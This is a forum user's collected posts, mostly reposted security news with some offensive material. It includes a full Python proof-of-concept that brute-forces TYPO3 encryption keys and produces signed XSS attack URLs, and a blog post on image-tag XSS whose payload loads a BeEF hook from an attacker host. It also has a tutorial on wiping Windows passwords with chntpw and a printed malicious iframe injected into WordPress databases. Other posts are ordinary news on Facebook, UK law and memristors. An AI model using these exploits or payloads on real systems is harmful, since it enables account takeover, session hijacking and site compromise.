Everything posted by begood
-
For all the credit Facebook has received for its privacy controls and user safety, the site still falls prey to an unsettling number of security issues and potential data breaches. Last month a botched code push accidentally revealed private user email addresses, and before that Facebook accidentally sent private messages to the wrong recipients. Today, security engineer Joey Tyson, AKA theharmonyguy, has detailed a major security hole in Facebook Platform — one that would allow a malicious website to silently access a user’s profile information, photos, and in some cases, messages and wall posts, with no action required on the user’s part. The exploit, which we’ve confirmed has now been patched, could hijack the session of a previously authorized third party Facebook application and invisibly pass it off to a malicious app. In his proof-of-concept, Tyson embedded Farmville in an invisible frame on his site. He then used some trickery with Facebook Platform parameters to pass all access rights Farmville had on to a malicious data harvesting application. In short, any of the many millions of people who had previously installed Farmville and visited the apparently benign proof-of-concept site would have their data invisibly harvested. If the user had granted Farmville additional permissions to access their Wall or messages, then the malicious app would have them too. Tyson only used Farmville in this instance because of its massive install base, but he could have used any other third party app. Fortunately, Tyson doesn’t have reason to believe this exploit has been abused, stating “It’s unlikely that any real-world attacks used this particular vulnerability, and I certainly have no record of such a case.” But he also notes that it may have existed for a year or longer. 
Further, Tyson thinks that Facebook still has problems with the way Platform is set up that expose it to vulnerabilities like this:

For more technical details on how the exploit worked, check out Tyson’s post. Tyson has written quite a few other articles detailing flaws with Facebook security, including his Month of Facebook Bugs, which exposed some serious issues with Facebook Platform last October (he notes that some of these have since been fixed).

Researcher Uncovers (Another) Major Facebook Security Exploit
Facebook Platform Vulnerability Enabled Silent Data Harvesting | Social Hacking
-
He was distributing viruses on the forum under the nick sppy some time ago. http://www.google.com/search?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&q=sppy_hacker Maybe you still want to contact him ))))))))))
-
And with "what works"? What do you use for DDoS? How many PCs? //later edit: hub .. later edit 2: you already had a ban on the forum. BAN. Bye, ratatovici.
-
PHP Shell's DiA/RRLF - 09.08.2007
-
The super-sleuth detectives in TV show CSI have some very nifty tools to help solve crimes. But the need to keep things interesting and wrap the show up in an hour means the technology used in each episode bears little resemblance to the work of real forensic experts. Or does it? When it comes to computer forensics, today's tools are becoming more advanced, leaving fewer places to hide information. This tension between fact and fiction took on a whole new dimension when Microsoft's police-only forensic toolkit was leaked on the internet. Reports say that it has more in common with CSI than The Bill. We're going to show you how to mimic Microsoft's offering using open-source software to unlock Windows accounts, investigate suspicious activity, see any file on a Windows disk and even peruse files that others believe have been permanently deleted.

Forensic toolkit

During November 2009, it was announced that someone had leaked Microsoft's secret crime-fighting software online. Described as a collection of programs linked by a sophisticated script, hackers and other cybercriminals had been dying to get their hands on it for some time. Now it's reportedly available to anyone brave enough to download and install it. The Computer Online Forensic Evidence Extractor (or COFEE for short) has been available to police forces since at least summer 2007, and is designed to gather forensic evidence at crime scenes and during raids from the still-running PCs of suspects and victims. COFEE reportedly takes the average police officer about 10 minutes to master, and comes supplied on a bootable USB pen drive. It enables trained officers to gather evidence from a running system without the need to call in cybercrime specialists, thereby speeding up investigations.
The USB drive itself is said to contain a package of about 150 forensic programs that enable an investigator to record sensitive information like internet history files and complete practical tasks like deleting Windows passwords. It also enables them to upload the recorded data for further analysis. By April 2008, it was reportedly in use by over 2,000 law enforcement officers throughout 15 countries. At the time of the leak, Microsoft claimed that COFEE was nothing more than a collection of commercially available programs brought together in a single handy package, which it makes available free of charge (if hitherto secretly) to help combat computer crime. If that's true, then is it also possible to create your own version of COFEE using free, open source software that will grant you complete access to a Windows computer? The answer is a resounding yes, but we must stress that using what you're about to learn for malicious purposes on a computer you don't own isn't big and it's certainly not clever. Don't use the following information to try to hack other people's computers or networks. Without the in-depth knowledge required to cover your tracks, you'll be caught and will probably face prosecution. If you hack computer systems in the US and get caught, you should be prepared to undergo a one-sided extradition process and go through a judicial system that will put you on a par with hardened terrorists before forcing you to serve a long prison sentence. There are plenty of commercial computer forensics systems around these days, but many of them cost serious money or are only available to the police. However, the open source community has a solution in the form of a special Linux distribution called Backtrack 4.

Introducing Backtrack 4

Backtrack 4 is based on a stripped-down version of Ubuntu Linux, which is a popular choice for home users because of its ease of installation and use.
The makers of Backtrack 4 have stacked the application with special security and forensics tools. These make it extremely useful to network security specialists and police forces, as well as anyone interested in knowing exactly what's happening on their own networks and any second-hand machines they've bought. Despite being Linux-based, Backtrack will grant you complete access to data stored on computers running any version of Microsoft Windows. That's because Windows isn't running when Backtrack is booted from a DVD or USB pen drive. Linux can read Windows disks, but it doesn't obey the file permissions, so the machine's hard disk simply seems to contain a lot of files waiting to be accessed. As well as booting and running directly from a DVD as a Live CD installation that never installs on your computer, you can also install Backtrack on a hard disk as the only operating system, or next to an existing Windows installation. If you plan to install Backtrack on a USB pen, you'll need one with a minimum 2GB capacity. This booting option brings Backtrack closer to Microsoft's COFEE than any other option. First, you need to download the Backtrack 4 ISO file, which is just under 1.6GB. You can download it from the Backtrack site directly or click the 'Torrent' link on the same page. There are multiple sources from which you can leech parts of the file in parallel, so in practice it's faster to download the ISO as a torrent. Once the ISO has downloaded, use it to make a bootable DVD. We've listed a free and easy to use CD/DVD package capable of making bootable disks in the Resources section. When that's done, test your work by ensuring your BIOS is set to boot from CD/DVD before attempting to boot from your hard disk, then insert the DVD and reboot the PC. Select the option to boot with a screen resolution of 1,024 x 768. When Backtrack has booted, you'll see a command line. To start a desktop environment, enter the command startx and press [Enter]. 
After a few seconds, the standard KDE desktop will start.

Find your way around

Backtrack is loaded with all the obscure little utilities used by professional security consultants. Many of them are fiddly command-line programs, but a lot have graphical front ends that make them simple to use. Hover your mouse over the icons on the menu bar at the bottom of the desktop and KDE will tell you the name of each one. We'll use the names that appear when you do this to make things easy to identify here. The network interface cards are designed for network security work, and are disabled by default when you boot up Backtrack. This is because if anyone (or anything) is listening to network traffic, the last thing you want to do is announce your presence by requesting an IP address over DHCP. To enable networking, click the black Konsole icon to open a terminal window, then enter the following command:

/etc/init.d/networking start

After a moment or two, during which lots of verbiage scrolls up the screen, open Firefox (the icon is next to the terminal on the menu bar) and enter Google as a URL. You should see the world's favourite search engine appear. Much like the Start button in Windows, the left-hand icon on the menu bar brings up the installed programs and system configuration options. This is called the K menu and is organised into subject areas. The one we're most interested in is the first: 'Backtrack'. Click on this and you'll see a submenu containing categories of hacking programs, with which Backtrack has been preloaded. Clicking one of these reveals nested subcategories right down to individual programs.

Map the neighbourhood

Let's begin by scanning the local network for hosts (another name for networked computers). Starting from the K menu, select 'Backtrack | Network Mapping | Identify Live Hosts | Autoscan'. A wizard will appear. Click 'Forward' and you'll be asked for the name of a network to scan. Leave this as 'Local network' and click 'Forward' again.
The next screen asks where the network is located. We're scanning the local network, so accept the default of it being connected to your computer by clicking 'Forward' once more. Next, select the default network adaptor. This will usually be called 'eth0'. If you don't see any adaptors in the pull down menu, it's because you didn't start networking earlier. Close Autoscan, start networking and run Autoscan again. Click 'Forward' one last time to confirm what you've asked Autoscan to do, then maximise the user interface that appears so you can see everything. Autoscan now contacts every possible IP address on the local subnet to see if there's a machine connected to it. If there is, it adds an entry to the left-hand pane. Notice that in some cases, Autoscan can even tell you the username that's logged in. When you select a host, Autoscan will attempt to gain more information about it for you. A wizard will also appear, asking you to add it to the Autoscan online database. Cancel this. You can go between tabs between the interface's right-hand panes to display a summary of the machine, detailed information or an inventory. Autoscan works by sending a stream of specially crafted packets to each host in turn. These are designed to return information about the running system and can give away a surprising amount of information. Autoscan is a useful tool for detecting whether your neighbours are leeching your Wi-Fi, for example. If you don't recognise a host, it's probably an intruder – so up your security!

Wipe passwords

Logging into a Windows system is easy using Backtrack, even if you don't know any of the usernames or passwords that have been set up. That's because you can use a utility bundled with Backtrack to remove the password on any Windows account, including administrator accounts. This is possible because of a file called the SAM (Security Access Manager), which is normally locked by the Windows kernel so that no one else can read it.
This is modifiable while Windows isn't running. First, we need to find out where the system's hard disk resides in Linux. To do this, click the Konqueror icon on the desktop menu bar. This will open the Konqueror desktop browser. Click the 'Storage media' link. If you don't see anything right away, press [F5] to refresh the view. Among the media that Backtrack knows about on your system, you'll see your hard disk. Click this and you'll see the folders in C:\, which is useful if you need to copy, add or modify files without logging into Windows directly. Now select the Home icon on the Konqueror toolbar (the one that's shaped like a house) and click the blue 'up' arrow next to it. Click the Media folder, and then the 'Hard disk' icon again. The location bar will change to give the name we must use to access the disk. It'll be something like '/media/disk'. Now, from the Start menu, select 'Backtrack | Privilege Escalation | Password Attacks | Chntpw'. 'Chntpw' stands for 'Change NT Passwords' and it works on all versions of Windows. When you run the command, a terminal window opens. You can ignore the verbiage on the screen and enter the following command:

chntpw -i /media/disk/Windows/System32/config/SAM

The capitalisations are very important here – 'chntpw' is all lowercase. If your Windows partition is called something other than 'disk', put its name in place of this in the command. Press [Enter] and a text-based menu will appear. Select 'Option one' and press [Enter] again. This gives you a list of the Windows user accounts. Type the name of the account you want to change (taking care to use the correct case for each letter) and then press [Enter]. Chntpw displays lots of details about the account and gives you a number of options. Select 'Option one' and the password will be removed from the account. To exit, type ! and press [Enter], then press [Q] and hit [Enter] again. Chntpw will ask if you want to write the hive files.
You do, so press [Y] followed by [Enter]. If you now reboot into Windows, you'll be able to log into the account you've changed without being prompted to enter a password.

Recovering deleted files

Many people believe that when they delete a file and then empty the Recycle Bin, it's gone for good – but this isn't the case. Windows, like all modern domestic OSes, simply marks the sectors on the disk occupied by the deleted file as available for future reuse. It would be inefficient to overwrite the data those sectors contain until new data is ready to be stored. In the meantime, the old file is still there, available to be read by anyone with access to a file recovery utility. Backtrack contains several such applications. Among the easier to use is PhotoRec, which is capable of scanning a hard disk and recovering a comprehensive list of all files marked as deleted. In fact, it can recover far more than just files deleted by users, including temporary files left over from when the operating system was installed. This means it's a good idea to have a spare USB pen drive handy to store the recovered files for later perusal, because they can easily run into the thousands. To get going, insert the drive and run Konqueror. Click 'Storage media' and then select your USB pen drive to ensure that Backtrack is aware of it. You can leave Konqueror open and check the scan's progress later. Now run PhotoRec by navigating to 'Backtrack | Digital Forensics | Forensic Analysis' and then selecting 'PhotoRec'. The program itself runs on the command line, but it's menu driven, making it easier to use. When PhotoRec runs, it first presents you with a list of the hard disk partitions on the computer. In the case of a Windows-only machine, there'll probably be only one large one. However, in some Windows 7 installations, there may be a second, small partition that the system uses to store recovery data.
Use the up and down arrow keys to select the main partition, then press [Enter] to continue. PhotoRec can understand a large number of partition table types and will automatically identify the one used on your disk, so accept the default on the next screen by pressing [Enter] again. The next screen enables you to specify the file types to recover. Use the left and right arrow keys to highlight 'File Opt' at the bottom of the screen. Next, press [Enter]. The resultant display will give you a long list of all the recognised types. If you only want to recover one file type (JPG, for example), press to deselect everything, then scroll down to the relevant type and press [space]. You can use the [Page up] and [Page down] keys to navigate through the list more quickly. Once you're happy with your file type selections, press [Enter] and select the filesystem you want to scan. Use the left and right arrow keys to select the 'Search' option, then press [Enter]. This presents you with a choice of file system types. For a Windows filesystem, make sure you select 'Other', then press [Enter]. On the next screen, select 'Free' to ensure that the program only scans disk sectors that are marked as free space. Press [Enter] again to continue. You'll now be asked where to store the recovered files. The default is the directory '/usr/local/bin', which is on the boot media. Press the left arrow key three times to get back to the root directory, then press the down arrow key repeatedly to navigate to the media directory. When you reach it, press [Enter] to see the media connected to the system. One of the devices you find should be the USB pen drive you inserted and navigated to in Konqueror just a moment ago. Select this and press [Enter] again. Finally, press [Y] to begin recovering deleted files. The extraction process can take quite a while, depending on how much free space there is to scan on the disk and the number of file types you've specified.
As the scan progresses, the number of files of each type will increase. PhotoRec creates a long list of subfolders in which it stores all the files it's recovered. By perusing these, you may be able to locate some interesting or even incriminating pictures and other documents.

How to create your own free computer forensics kit on a USB drive | News | TechRadar UK
-
Late Thursday night the U.K. Parliament passed the controversial Digital Economy Bill, which grants the U.K. government sweeping new powers to control access to the Internet. The Digital Economy Bill has been the subject of heavy entertainment industry lobbying and widespread concern amongst U.K. citizens and telecommunications companies because it included provisions that would allow the U.K. government to censor websites considered "likely to be used for or in connection with an activity that infringes copyright," and disconnect the Internet connection of any household in the U.K. with an IP address alleged to have engaged in copyright infringement. Despite the many concerns expressed with the Bill's provisions, including questions by some Members of Parliament about whether these provisions could be used to block access to the Wikileaks website, the bill was rushed through Parliament -- apparently with several amendments that we're still assessing -- after only two hours of debate in a special late-night "wash-up" session. If you're in the U.K., we encourage you to join the Open Rights Group's campaign and express your views to your MPs now. You might also want to switch to an Internet Service Provider that understands the implications of the Digital Economy Bill and is willing to commit to protecting your civil liberties, like Talk Talk.

More information:
U.K. Passes Internet Censorship and Disconnection Law | Electronic Frontier Foundation
-
SFX-SQLi (Select For XML SQL injection) is a new SQL injection technique which allows extracting the whole information of a Microsoft SQL Server 2005/2008 database in an extremely fast and efficient way. This technique is based on the FOR XML clause, which is able to convert the content of a table into a single string, so its contents could be appended to some field by injecting a subquery into a vulnerable input of a web application.

SFX-SQLi (Select For XML SQL injection)
-
There are the usual XSS tests. And then there are the fun ones. This is a story about a more exotic approach to testing XSS.... I was testing a company that had passed all XSS tests from their pentester. I found that they allowed users to write HTML tags. Of course they didn't permit <script> tags or <iframe> tags. (Well, they did allow those, but that was an oops - no server side filtering.) This company had whitelisted a variety of "safe" tags for use by clients. That's boring, right? Heh, thanks to Ron, I had a way to abuse their whitelist. (I've since found this in Web Application Hackers Handbook, but I seem to have overlooked it at the time I read it.) Three HTML 4 tags in particular allow javascript to be run from one of the elements and these are: <img>, <object>, and <style>. You are really unlikely to see <object> and <style> tags permitted, but <img> tags are a bit more common. Note: since my work on this site, I've seen RSnake's page and other pages that talk about using <img src="alert('XSS')">. That was nice in the past, but none of my current version browsers will execute that. (Makes me wonder if the whole tracking image thing from emails of yesteryear still works, but that's a rabbit trail. If you know, post a comment.) Still, just because I can't source the javascript, doesn't mean I can't execute javascript.... We'll use different HTML 4 elements. Now, in my scenario, I decided to input <img src="blah.jpg" onerror="alert('XSS')"/> and reloaded the page. BINGO! I got a popup box. This also works and has the advantage of a working image: <img src="realimage.png" onload="alert('XSS')"/>. That's cool. It's really easy to check that off on your list and say "vulnerable to XSS." But, can you do anything besides popping boxes? Doing something would be useful. I had a question about all this, "will these elements support more than an alert box or is this a useless novelty?" More tests were in order. 
So, then we could replace alert() with document.write() and write the cookie to our server. This swipes cookies and that's better than a popup. But why stop there? Why not create a <script> on the page itself? What's that you say? <script> isn't on the whitelist? So, your point? If your browser creates the <script> locally, it can't be filtered, now can it? Thanks to Mak (@mak_kolybabi) for giving me some of the tips I needed to get this going in the correct direction. How about we try this:

<img onload="var s = document.createElement('script'); s.src='http://evil-site/beef/hook/beefmagic.js.php';document.getElementsByTagName('head')[0].appendChild(s);" src="real_image.jpg" />

We have an image that triggers the onload element. Now we tell the browser to create a script element. You may not be able to write <script>, but you are able to write the word "script." The createElement function tells the browser to create the <script></script>. It's local to the client and the server has no idea. Then we give the source element (what else would you use but BeEF?) and then we place our new element into the page. Voilà! You've just turned a simple <img> tag into stored XSS.... I have noticed that using onload="local_function()," IE8 and FF3.6 have "issues." Not sure what it is quite yet. I spent a few moments looking around to see if I could locate websites that allow you to use HTML tags. From a cursory perspective, Slashdot is safe, so is Digg, and most forums are now using BB Code. So, how useful is this? I'd wager it's probably a last resort. If you chained attacks you could potentially use it. Suppose you bypassed the front line of defense (like so) in a manner that allowed you to write tags, but ran into some sort of whitelist filtering on the server preventing <script> tags. Now you have a way to create script tags while evading the filter. We're not done yet.... Now, you might think that all of this is trivial and not very important.
I mean seriously, who allows users to write tags at all? Let's look forward for a moment. HTML5 is coming. According to this site (and I have to think that they would know), we find this beautiful bit of information: all event handlers must be supported by all elements, or something like that. And there are a bunch of new event handlers. In other words, not only do we have access to onload/onerror in every element, we get lots more.... Stored XSS will be everywhere for years. All these wannabe web guys who implement the cool new whizbang HTML5 as soon as it ships, will be running huge risks unless they carefully filter out event handlers. (At least they need to prevent users from implementing event handlers.) We've seen how well this has worked in the past, so my hopes for reasonably secure implementation are exactly nonexistent. And if you have a site that you want to allow users to write tags, try switching to BB Code. It's safer. Well, in 10 minutes of testing I didn't see how to bypass it as it doesn't support anything. Currently, I am developing a page that will test a browser's support of HTML 5 action events. If you have suggestions or tips, send them my way. I'm currently muddling through my coding. Oh and just think about what would happen if someone accidentally on purpose managed to rewrite the <img> element on Digg - The Latest News Headlines, Videos and Images or Google. Would anyone ever notice? How long would it take to find it? Seriously, looking for a compromise, who'd look at the official logo for the infection? Enjoy your nightmares people.

SkullSecurity Blog Archive Exotic XSS: The HTML Image Tag
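The filtering gap described in the post above, as an added example that is not part of the original post: a tag-only allowlist accepts the post's <img> payloads, while a sanitizer that also allowlists attributes and URL schemes strips the event handlers. The allowlist contents, function names and the placeholder script URL are assumptions made for this illustration.

```python
import re
from html import escape
from html.parser import HTMLParser

# Hypothetical allowlist for this example: tag -> attributes permitted on it.
ALLOWED = {
    "b": set(), "i": set(), "em": set(), "strong": set(), "p": set(), "br": set(),
    "a": {"href", "title"},
    "img": {"src", "alt", "width", "height"},
}
URL_ATTRS = {"href", "src"}
VOID_TAGS = {"br", "img"}            # elements that never get a closing tag
RAW_TEXT_TAGS = {"script", "style"}  # their bodies are dropped, not echoed as text
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.\-]*):", re.IGNORECASE)

# Constructed sample inputs modelled on the payloads quoted in the post.
SAMPLES = [
    '<img src="blah.jpg" onerror="alert(\'XSS\')"/>',
    '<img src="realimage.png" onload="alert(\'XSS\')"/>',
    '<img onload="var s = document.createElement(\'script\'); '
    's.src=\'https://attacker.invalid/hook.js\';'
    'document.getElementsByTagName(\'head\')[0].appendChild(s);" src="real_image.jpg" />',
]


def tag_only_filter_accepts(fragment):
    """The weak check: only tag names are compared against the allowlist."""
    tags = re.findall(r"<\s*/?\s*([a-zA-Z][a-zA-Z0-9]*)", fragment)
    return all(t.lower() in ALLOWED for t in tags)


def safe_url(value):
    """Allow relative and http(s) URLs; reject javascript:, data: and the like."""
    # Browsers ignore whitespace and control characters inside a scheme name.
    cleaned = "".join(ch for ch in value if ch > " ")
    match = SCHEME_RE.match(cleaned)
    return match is None or match.group(1).lower() in ("http", "https")


class Sanitizer(HTMLParser):
    """Rebuilds the fragment from allowlisted tags and attributes only."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []   # what was removed, useful for logging and alerting
        self._skip = None   # name of the raw-text element being skipped, if any

    def handle_starttag(self, tag, attrs):
        if tag in RAW_TEXT_TAGS:
            self._skip = tag
        if tag not in ALLOWED:
            self.dropped.append("<%s>" % tag)
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            # Every on* handler fails this test because no handler is allowlisted.
            if name not in ALLOWED[tag] or (name in URL_ATTRS and not safe_url(value)):
                self.dropped.append("%s@%s" % (tag, name))
                continue
            kept.append(' %s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag == self._skip:
            self._skip = None
        elif tag in ALLOWED and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if self._skip is None:
            self.out.append(escape(data, quote=False))


def sanitize(fragment):
    """Return (clean_html, list_of_dropped_items)."""
    parser = Sanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out), parser.dropped


if __name__ == "__main__":
    for sample in SAMPLES:
        print(tag_only_filter_accepts(sample), sanitize(sample))
```

The attribute check is the part the tag whitelist in the story lacked: the same allowlist rule covers any event handler a browser adds later, because nothing is permitted by default.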
-
This short screen capture demonstrates the use of the Typo3 Encryption Key tool found on c22.cc. This tool exploits the weak encryption key found in versions 4.2.3 and earlier of Typo3 (see Typo3-sa-2009-001 / Insecure Randomness vulnerability). Typo3 Encryption Key Attack on Vimeo original script location : Tools/Scripts ©????²² (in)s??u?it? TYPO3EncKeyTool.py # TYPO3 Encryption Key - Proof of Concept # # Chris John Riley # blog.c22.cc # contact@c22.cc # 16/12/2008 (23/01/2009) # Version: 1.23 # # Changelog # 1.23 --> Small corrections # 1.22 --> Fixed mistake in the attack string creation. Changed bodytag to bodyTag to corect mismatching MD5 results. import hashlib import urllib import getopt import sys import re from string import split from urlparse import urlparse dictionary = '' file= '' width = '' height = '' effects = '' bodytag = '' title = '' wrap = '' md5 = '' def main(): global file global width global height global effects global bodytag global title global wrap global md5 global enckey success = '' i = 0 urlquery = url.query.split('&') print " Base URL | ", baseurl while i < len(urlquery): # Loop through each part of the query urlsplit = urlquery[i].partition('=') j = 0 # Loop through to split the variables and values from the URL while j < (len(urlsplit)): if urlsplit[j].lower() in ("file", "width", "height", "effects", "bodytag", "title", "wrap", "md5"): if (urlsplit[j].lower() == "file"): file = urlsplit[j+2] # When split using partition the out put is "file" "=" "value" - j+2 is used to skip the "=" and set the value print " file | ", file elif (urlsplit[j].lower() == "width"): width = urlsplit[j+2] print " width | ", width elif (urlsplit[j].lower() == "height"): height = urlsplit[j+2] print " height | ", height elif (urlsplit[j].lower() == "effects"): effects = urlsplit[j+2] print " effects | ", effects elif (urlsplit[j].lower() == "bodytag"): bodytag = urlsplit[j+2] print " bodytag | ", bodytag elif (urlsplit[j].lower() == "title"): title = 
urlsplit[j+2] print " title | ", title elif (urlsplit[j].lower() == "wrap"): wrap = urlsplit[j+2] print " wrap | ", wrap elif (urlsplit[j].lower() == "md5"): md5 = urlsplit[j+2] print " md5 | ", md5 else: break else: break j = j+1 i = i+1 urlreform = urllib.unquote_plus("|".join((file, width, height, effects, bodytag, title, wrap)) +'|') print "\n" +"-" *80 print " Attempting to find a matching MD5" print "-" *80 print " Test string | ", urlreform +"<BRUTE-FORCE>|" print "-" *80 print " Desired MD5 | ", md5 print "-" *80 if default == True: # Attempt to check default Typo3 Encryption keys print "\n" +" Beginning default Encryption Key attack" y = 0 while y < 1000: # This section performs the MD5 hashing and comparison # By recreating the hash and comparing against the original from the URL # the Encryption Key can be recovered / brute-forced # Details on the process used can be found in the paper discussing the vulnerability md5def1 = hashlib.md5(str(y)) md5def2 = hashlib.md5(md5def1.hexdigest()) md5def3 = "".join((md5def1.hexdigest(), md5def2.hexdigest())) md5def4 = hashlib.md5(md5def3) md5def5 = "".join((md5def3, md5def4.hexdigest())) testinput = "".join((urlreform, md5def5)) +'|' testresult = hashlib.md5(testinput) if testresult.hexdigest() == md5: # Match brute-forced MD5 against the one from the URL success = True break y = y+1 if success: enckey = md5def5 print "\n" +"_" *80 print "=" *80 print "-" *80 print "\n Default Hash found is", md5def5 print "\n" +"_" *80 print "=" *80 print "-" *80 change = raw_input(' Do you want to use this Encryption key to create a new URL (y/n): ') if change == 'y': createlink() # Create valid URL using the recovered Encryption Key else: sys.exit() else: if dictionary == True: print "\n Default Hash not found. Proceeding to dictionary attack" else: print "\n Default Hash not found." 
        if dictionary == True: # Attempt to brute-force the Encryption Key using a dictionary file
            print " Using dictionary file = ", dictfile
            try:
                for word in open(dictfile): # Loop through words in the file
                    word = word.rstrip('\n') # Strip new line characters
                    testinput = "".join((urlreform, word)) +'|' # Combine the word before creating the MD5 hash
                    testresult = hashlib.md5(testinput)
                    if testresult.hexdigest() == md5: # Compare the created hash to the one from the URL
                        success = True
                        break
                if success:
                    enckey = word
                    print "\n" +"_" *80
                    print "=" *80
                    print "-" *80
                    print "\n Encryption Key recovered .:", word
                    print "\n" +"_" *80
                    print "=" *80
                    print "-" *80
                    change = raw_input(' Do you want to use this Encryption key to create a new URL (y/n): ')
                    if change == 'y':
                        createlink() # Create valid URL using the recovered Encryption Key
                    else:
                        sys.exit()
                else:
                    print "-" *80
                    print " Encryption Key not found"
                    print "-" *80
            except IOError:
                print dictfile, "not found!"

    def usage():
        print "\n\n" +"-" *80
        print " Typo3 Encryption Key Tool"
        print "\n Version 1.22"
        print "-" *80
        print "\n www.c22.cc"
        print "\n This Proof of Concept script takes input in the form of a"
        print " TYPO3 URL (specifically one using the tx_cms_showpic class)"
        print " The script will then perform a check against known default"
        print " Encryption Keys or use a dictionary file to perform a brute"
        print " force attack in an attempt to recover the Encryption Key in"
        print " use on the remote server. Once the Encrpytion Key is recovered"
        print " the option is given to insert an attack string (i.e. XSS)"
        print " into the wrap element of the URL passed to the command line."
        print " the script will then recalculate a valid MD5 using the recovered"
        print " Encryption Key and provide a valid attack URL to the user."
        print "\n\n Usage .:"
        print "\n -u / --url <'Complete URL within single quotes'>"
        print " -f / --file <Path to dictionary file>"
        print " -d / --default <Check against the default encryption keys>"
        print ""

    def createlink():
        # Once the Encryption Key has been recovered / brute-forced, it's possible to alter the original URL to contain attack code (XSS code, etc..)
        # This section recreates the URI with a valid MD5 (created using the Encryption Key)
        print "\n Please insert your desired attack string."
        print " This string will be inserted into the"
        print " wrap section of the URL"
        attackstring = raw_input ('===> ') # Input attack code
        print " inserting", attackstring, "into the wrap tag"
        attackurl = "file=", file, "&width=", width, "&height=", height, "&effects=", effects, "&bodyTag=", bodytag, "&title=", title, "&wrap=", attackstring, "&md5="
        attackurl = urllib.unquote_plus("".join((attackurl))) # Link all variables together before creating the new MD5
        attackmd5 = urllib.unquote_plus("|".join((file, width, height, effects, bodytag, title, attackstring, enckey)) +'|')
        print attackmd5
        attackmd5 = hashlib.md5(str(attackmd5))
        attackmd5 = attackmd5.hexdigest() # We now have the newly created MD5
        attackurl = "".join((str(attackurl), str(attackmd5)))
        attackurl = "".join((attackurl))
        attackurl = "&".join((baseurl, attackurl))
        print "\n" +"_" *80
        print "=" *80
        print "-" *80 +"\n"
        print " Attack string .:\n\n" # Attack string is output with newly created MD5 hash
        print "", attackurl
        print "\n" +"_" *80
        print "=" *80
        print "-" *80

    try:
        opts, args = getopt.getopt(sys.argv[1:], "u:f:dh", ["url=", "file=", "default", "help"])
    except getopt.GetoptError:
        usage()
        sys.exit(2)

    if len(sys.argv) < 4:
        usage()
        sys.exit(2)

    for opt, arg in opts:
        if opt in ("-h", "--help"):
            usage()
            sys.exit()
        elif opt in ("-u", "--url"):
            url = urlparse(arg, scheme='http', allow_fragments=False)
            eID = url.query.split('&')[0]
            baseurl = "?".join((("".join((("://".join((url.scheme, url.netloc))), url.path))), eID)) # Recreate the URL up to the end of the eID parameter
        elif opt in ("-f", "--file"):
            dictfile = arg
            dictionary = True
        elif opt in ("-d", "--default"): # Check that the Typo3 Encryption key isn't set to a default value
            default = True

    print "\n" +"_"*80
    print "-"*80
    print "\n" +" TYPO3 4.2.3 Offline Encryption Key brute forcer"
    print " Chris John Riley (blog.c22.cc)"
    print " Version 1.23 (March 2010)"
    print "\n" +"_"*80
    print "-"*80
    print "\n" +" Data extracted from URL .:"
    print ""

    if __name__== '__main__':
        main()
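The script works because the link checksum it recomputes is a plain MD5 over the pipe-joined parameters with the Encryption Key appended, so a default or dictionary-word key can be confirmed offline from a single URL. The following is an added example, not code from the original post or from TYPO3: it puts that construction next to a keyed HMAC-SHA256 check with a random key and a constant-time comparison. The function names and sample values are constructed for illustration.

```python
import hashlib
import hmac
import secrets

# Parameter order taken from createlink() in the script above.
FIELDS = ("file", "width", "height", "effects", "bodyTag", "title", "wrap")

# Constructed sample parameters, not taken from any real site.
SAMPLE = {
    "file": "pic.jpg", "width": "100", "height": "100", "effects": "",
    "bodyTag": "<body>", "title": "Title", "wrap": "<a>|</a>",
}


def legacy_checksum(params, enckey):
    """md5(field|field|...|key|), as the script above recomputes it."""
    material = "|".join([params[f] for f in FIELDS] + [enckey]) + "|"
    return hashlib.md5(material.encode("utf-8")).hexdigest()


def new_signing_key():
    """32 random bytes: nothing a default-key list or dictionary can contain."""
    return secrets.token_bytes(32)


def _encode(params):
    # Length-prefix every field so the field boundaries are unambiguous.
    out = bytearray()
    for name in FIELDS:
        value = params[name].encode("utf-8")
        out += len(value).to_bytes(4, "big") + value
    return bytes(out)


def sign(params, key):
    """Keyed tag over all link parameters (HMAC-SHA256, hex encoded)."""
    return hmac.new(key, _encode(params), hashlib.sha256).hexdigest()


def verify(params, tag, key):
    """Constant-time comparison; any changed field invalidates the tag."""
    return hmac.compare_digest(sign(params, key), tag)


if __name__ == "__main__":
    key = new_signing_key()
    tag = sign(SAMPLE, key)
    print("legacy checksum :", legacy_checksum(SAMPLE, "constructed-key"))
    print("hmac verifies   :", verify(SAMPLE, tag, key))
    print("tampered wrap   :", verify(dict(SAMPLE, wrap="<i>|</i>"), tag, key))
```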
-
Described in 1971, made in 2008: 'memristors' promise a computer revolution.

High-school physics students grappling with the delights of capacitors, inductors and resistors will be groaning into their exercise books. Electronics experts in California have finally succeeded in proving the existence of a fourth fundamental unit of electronic circuits: the 'memristor'.

The existence of the memristor, short for 'memory resistor', was first suggested in 1971, but only now have researchers succeeded in creating a real, working example. They hope that the new components could revolutionize computing, promising an end to frustrating waits for your computer to boot up.

"A memristor is essentially a resistor with memory," explains Stan Williams of HP Labs in Palo Alto, California, who reports the memristor's creation in this week's Nature. "The actual resistance of the memristor changes depending on the amount of voltage and the time for which that voltage has been applied to the device."

That means that a computer created from memristive circuits can 'remember' what has happened to it previously, and freeze that memory when the circuit is turned off. This quality could allow computers to turn off and on again in an instant, as all the components could revert to their last state instantly, rather than having to 'boot up'.

http://www.physorg.com/news190016024.html
Found: the missing circuit element : Nature News
-
Since yesterday we are seeing a large number of Wordpress blogs (running the latest version 2.9.2) getting infected with malware. None of them are using the same plugins or the same themes. Some of them even have wp-admin access blocked to only a few IPs and via htpasswd password. The only similarity between them is that they are all shared hosts at Network Solutions.

Some of our clients spoke with Network Solutions and they confirmed that all their Wordpress sites are having issues, but their servers are clean (are they?).

What is interesting about this attack is that it does not create or modify any files, so the average security advice does not apply here. The only thing it does is modify your "siteurl" inside the "wp-option" table to point to http://networkads.net/grep/, breaking the site layout completely.

This is what it looks like in the database:

    (2, 0, 'siteurl', '<iframe style=\"display:none\" height=\"0\" width=\" 1\" src=\"http://networkads.net/grep/\"></iframe>', 'yes'),

